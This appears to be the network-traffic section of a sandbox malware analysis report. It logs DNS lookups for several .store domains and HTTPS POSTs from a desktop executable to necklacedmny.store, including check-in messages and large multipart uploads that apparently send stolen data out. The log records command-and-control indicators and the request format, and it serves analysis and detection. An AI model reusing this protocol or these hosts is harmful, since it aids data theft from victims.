Oct 29, 2024 12:04:08.962974072 CET | 53 | 57868 | 1.1.1.1 | 192.168.2.6
Oct 29, 2024 12:04:08.983859062 CET | 53952 | 53 | 192.168.2.6 | 1.1.1.1
Oct 29, 2024 12:04:08.996100903 CET | 53 | 53952 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 29, 2024 12:04:08.899007082 CET | 192.168.2.6 | 1.1.1.1 | 0x45d2 | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.915142059 CET | 192.168.2.6 | 1.1.1.1 | 0x83fd | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.925952911 CET | 192.168.2.6 | 1.1.1.1 | 0x1e20 | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.942332029 CET | 192.168.2.6 | 1.1.1.1 | 0x1ab3 | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.983859062 CET | 192.168.2.6 | 1.1.1.1 | 0xdb5a | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 29, 2024 12:04:08.908905029 CET | 1.1.1.1 | 192.168.2.6 | 0x45d2 | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.924704075 CET | 1.1.1.1 | 192.168.2.6 | 0x83fd | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.940785885 CET | 1.1.1.1 | 192.168.2.6 | 0x1e20 | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.962974072 CET | 1.1.1.1 | 192.168.2.6 | 0x1ab3 | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.996100903 CET | 1.1.1.1 | 192.168.2.6 | 0xdb5a | No error (0) | necklacedmny.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 29, 2024 12:04:08.996100903 CET | 1.1.1.1 | 192.168.2.6 | 0xdb5a | No error (0) | necklacedmny.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
• necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-29 11:04:09 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
2024-10-29 11:04:10 UTC | 1015 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 11:04:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=18ttpnbpqc4bvqgcckucp6qmsu; expires=Sat, 22 Feb 2025 04:50:49 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OjoS0ZjX9lOZUaLH1mqD8%2B8AjYhz1dGL3dCkWrPOtJDCn%2Bojw51WP6FBpzbwiHk7o6UpMH27dxopXfeJ10WB0pAEwUfd3jPphqGmyUNWxOkeCCvl6YboXfqJXs%2BE1%2F0ovY2HZbg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da2aee5d8562e63-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=b4512429f25b1be7&ts=534&x=0"
2024-10-29 11:04:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-29 11:04:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49710 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 11:04:11 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: necklacedmny.store
2024-10-29 11:04:11 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-29 11:04:12 UTC | 1020 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 11:04:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=fgs5cgnf8a5cbfb5s5b0hm6cr3; expires=Sat, 22 Feb 2025 04:50:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ep9Qc08TuyFphHiaMrKtBLw%2Bt35XfZQpVoI0xsA3t0lVZt7pDPJ2qCo%2BProkFNJpx1lXx2bhsZAMWuTG%2B3Wzdhq%2FKzm%2B4YDCuqJ1O0DIhLltDvDkQ1iWJwn%2FlD7umzuMm8vlsqQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da2aeed8dc9e847-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1389&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=954&delivery_rate=1984921&cwnd=251&unsent_bytes=0&cid=4d8b66ac883ec25d&ts=1507&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49712 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 11:04:13 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12864
Host: necklacedmny.store
2024-10-29 11:04:13 UTC | 12864 | OUT | Data Ascii (multipart body, line breaks restored from the CRLF bytes of the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

86F41B37717F125E0EFACD6908BDFF60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-29 11:04:50 UTC | 1028 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 11:04:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=gh3dhjmokd5f5kdq0j1i4g178l; expires=Sat, 22 Feb 2025 04:50:52 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UPe9t6P4Zd5lFvFo%2FcGVLazfcYEN1%2FC2h9ftA2r%2Fdlkk%2FYZYIodwNlt2hqLDFHbjg8AICDY9uYeSU0uXP%2F2Re6JMvT7gspBp8I73Y%2FlcYH0Sf6q3AL%2BK8q1Vpg%2BfUaz4mWq9av0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da2aefc2a736b89-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1811&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13806&delivery_rate=1549491&cwnd=251&unsent_bytes=0&cid=f3e70e0fe180bd1f&ts=37176&x=0"
2024-10-29 11:04:50 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
Data Ascii: 11ok 173.254.250.72
2024-10-29 11:04:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49899 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 11:04:51 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15110
Host: necklacedmny.store
2024-10-29 11:04:51 UTC | 15110 | OUT | Data Ascii (multipart body, line breaks restored from the CRLF bytes of the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

86F41B37717F125E0EFACD6908BDFF60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

2
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
2024-10-29 11:04:51 UTC | 1012 | IN | HTTP/1.1 200 OK
Date: Tue, 29 Oct 2024 11:04:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=tq2ulbprjogjb55j4c1dncigk6; expires=Sat, 22 Feb 2025 04:51:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhDpJM8cE5S2FZX1uqWpaYqnbSjS6q38m5rhfwoGkMNtwckiUrDV1UvY4BXNKpOAGE71sbUtsQ028ujFy37DB5JmWj3iLuw4qVMclEI2epG3zEBAAyMx1yIqBWUpjp%2BnehoAvMs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da2afe92e8bb78d-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16052&delivery_rate=2210687&cwnd=68&unsent_bytes=0&cid=dc783f018ce248a4&ts=560&x=0"
2024-10-29 11:04:51 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
Data Ascii: 11ok 173.254.250.72
2024-10-29 11:04:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49908 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-29 11:04:52 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19968
Host: necklacedmny.store
2024-10-29 11:04:52 UTC | 15331 | OUT | Data Ascii (multipart body, line breaks restored from the CRLF bytes of the raw dump):
--be85de5ipdocierre1
Content-Disposition: form-data; name="hwid"

86F41B37717F125E0EFACD6908BDFF60
--be85de5ipdocierre1
Content-Disposition: form-data; name="pid"

3
--be85de5ipdocierre1
Content-Disposition: form-data; name="lid"

4SD0y4--legen
                                                                                  2024-10-29 11:04:52 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                                  Data Ascii: +?2+?2+?o?Mp5p
                                                                                  2024-10-29 11:04:53 UTC | 1017 | IN | HTTP/1.1 200 OK
                                                                                  Date: Tue, 29 Oct 2024 11:04:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=0johvvsdnvqm3ngoe3ii9ej6hf; expires=Sat, 22 Feb 2025 04:51:32 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWE8%2BSCFaAo2NmDNHsBWrFlSWWL6x%2BQuGb%2F4DaIZ7fdIvjN5yec31iVJNoVfMu0w9djxam8EJNmKmfGjttFJSuKQSJlIdRNMttOrocH6DtdRhmBGc95jtKt6qSVVS1pdZvRZ6Qk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8da2aff1bf5883a4-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1372&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20932&delivery_rate=2038001&cwnd=251&unsent_bytes=0&cid=bb4c1884ac87ea3c&ts=682&x=0"
                                                                                  2024-10-29 11:04:53 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.72
                                                                                  2024-10-29 11:04:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  5 | 192.168.2.6 | 49919 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-10-29 11:04:54 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1227
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:04:54 UTC | 1227 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.6 | 49989 | 188.114.96.3 | 443 | 2736 | C:\Users\user\Desktop\file.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-10-29 11:05:09 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 571410
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 46 34 31 42 33 37 37 31 37 46 31 32 35 45 30 45 46 41 43 44 36 39 30 38 42 44 46 46 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"86F41B37717F125E0EFACD6908BDFF60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 8f 28 4d 93 e8 e6 ac cc 08 63 6c e4 4c d5 24 df 86 79 8b 0a 59 79 7c ac bc 51 6a 8a 9e d4 95 c4 f2 c9 b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58
                                                                                  Data Ascii: (MclL$yYy|QjbFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 27 ac 55 6b 05 24 bd 7e 94 b5 87 e1 07 cc 37 8e dd ee e7 3e 81 09 cc fa 35 f3 81 96 94 82 4a 76 f3 44 e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d
                                                                                  Data Ascii: 'Uk$~7>5JvD?|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 1f e4 e5 bf f5 27 1e 4e 9b b9 45 bf 69 c1 97 be 7e ff b8 e6 8b 62 70 82 f9 71 a1 52 df 15 d2 a4 76 e8 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49
                                                                                  Data Ascii: 'NEi~bpqRvO,v;Uo|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyI
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: da d0 9c 07 c8 37 08 89 82 d7 ed da 86 9a ab 7e 13 be aa 8e c8 da 85 ea c0 b1 c1 21 26 67 f1 b8 26 44 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86
                                                                                  Data Ascii: 7~!&g&D;k7vK.ON_S-WjZ+kq*<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?n
                                                                                  2024-10-29 11:05:09 UTC | 15331 | OUT | Data Raw: 08 e3 d9 bd a8 63 0d 1f fd 92 74 35 dd eb 17 3c 5e 64 59 29 d3 03 40 85 97 34 b2 e0 37 ad 9a 80 ba a2 d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5
                                                                                  Data Ascii: ct5<^dY)@47Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp|bhx}lCd
